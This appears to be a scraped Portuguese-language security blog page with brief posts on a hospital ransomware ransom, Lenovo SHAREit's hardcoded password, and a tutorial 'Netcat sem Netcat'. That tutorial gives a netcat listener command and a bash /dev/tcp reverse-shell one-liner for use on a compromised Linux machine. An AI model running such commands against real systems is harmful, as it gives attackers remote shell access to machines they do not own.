https://www.infosec.com.br/wp-content/uploads/2017/04/cropped-logo_infosec_300x75-1.png
0
0
juliocesar
https://www.infosec.com.br/wp-content/uploads/2017/04/cropped-logo_infosec_300x75-1.png
juliocesar2016-02-24 12:38:192017-03-13 21:31:53Ransomware Proof of Concept dando Bypass no antivírus do windows
https://www.infosec.com.br/wp-content/uploads/2016/02/bitcoin.jpg
388
690
juliocesar
https://www.infosec.com.br/wp-content/uploads/2017/04/cropped-logo_infosec_300x75-1.png
juliocesar2016-02-18 16:48:122017-03-13 21:27:133 milhões de dólares em bitcoins
https://www.infosec.com.br/wp-content/uploads/2016/02/sh_nc_wo_nc.png
302
727
juliocesar
https://www.infosec.com.br/wp-content/uploads/2017/04/cropped-logo_infosec_300x75-1.png
juliocesar2016-02-05 12:45:592017-03-13 21:28:55Netcat sem Netcat no linux
https://www.infosec.com.br/wp-content/uploads/2017/04/cropped-logo_infosec_300x75-1.png
0
0
juliocesar
https://www.infosec.com.br/wp-content/uploads/2017/04/cropped-logo_infosec_300x75-1.png
juliocesar2016-01-27 13:50:542017-07-26 20:46:26Lenovo protege sua segurança com a senha "12345678" no ShareIt
![Verified by MonsterInsights Verified by MonsterInsights](https://www.infosec.com.br/wp-content/plugins/google-analytics-for-wordpress/assets/images/monsterinsights-badge-light.svg)
Scroll to top
Ransomware Proof of Concept dando Bypass no antivírus do windows
3 milhões de dólares em bitcoins
Mais uma vez o vírus ransomware ganhou destaque nas manchetes. Dessa vez o alvo foi o hospital The Hollywood Presbyterian Medical Center localizado em Los Angeles, eles tiveram seus dados criptografados e agora não conseguem acessar dados importantes de seus pacientes. Para liberar a senha que será usada para descriptografar esses dados os hackers estão pedindo uma bagatela de 3 milhões de dólares como resgate. Apesar do estrago que esses ransomware vem causando, a prevenção é muito simples: NÃO CLIQUE NAQUILO QUE VOCÊ NÃO SABE A PROCEDÊNCIA !!!!
P.S: Grandes sites como CNBC e a afiliada da NBC em Los Angeles reportaram que o valor do resgate foi de 3.7 milhões de dólares, sites menores estão dizendo que o valor não passou de 17 mil dólares. O próprio hospital emitiu uma nota dizendo que o valor pago pelo resgate foi de 17 mil dólares. O valor real pago ninguém sabe, o hospital pode ter emitido essa nota com valor inferior até mesmo para não incentivar outros ataques.
Netcat sem Netcat no linux
Por acaso você já conseguiu acesso a uma máquina rodando linux e ai você tentou rodar o netcat para fazer um shell reverso, mas se deparou por exemplo com o fato de que a máquina alvo não tinha o netcat instalado ou de repente você tentou instala-lo mas por algum motivo ele não funcionou?
Bom como todos sabemos geralmente ambientes linux tem o netcat instalado por padrão, mas você pode acabar se deparando com alguma máquina que esteja rodando linux mas não tem o netcat instalado. Os motivos para tal podem ser os mais diversos possíveis. Bom independente de qualquer coisa não se preocupe, existe diversas maneiras de usarmos o netcat sem ter o netcat instalado na máquina alvo. Abaixo segue uma das maneiras com que podemos fazer isso.
Bom a primeira coisa que precisamos fazer é rodar o netcat na nossa máquina e coloca-lo em em listen mode ou modo de escuta, para isso utilizamos o seguinte comando:
nc -n -v -l -p porta-desejada
Agora na máquina alvo utilizamos o seguinte comando:
/bin/bash -i > /dev/tcp/ip-da-máquina-do-atacante/porta-na-qual-o-necat-está-ouvindo-na-máquina-do-atacante 0<&1
O camando acima vai fazer com que a máquina alvo se conecte na máquina do atacante. Vale lembrar que o comando acima pode não funcionar em todas as distribuições linux, caso isso ocorra se vire nos 30.
Não sabe quem é esse tal de netcat? Well google it.
Lenovo protege sua segurança com a senha “12345678” no ShareIt
O que você espera de um gigante da tecnologia para proteger a segurança do seu serviço SHAREit? com algum tipo de proteção correto?
Mas e se essa proteção for uma senha, e mais ainda, e se a senha for nada mais nada menos que “12345678” que vem hard-coded no software?
Leia mais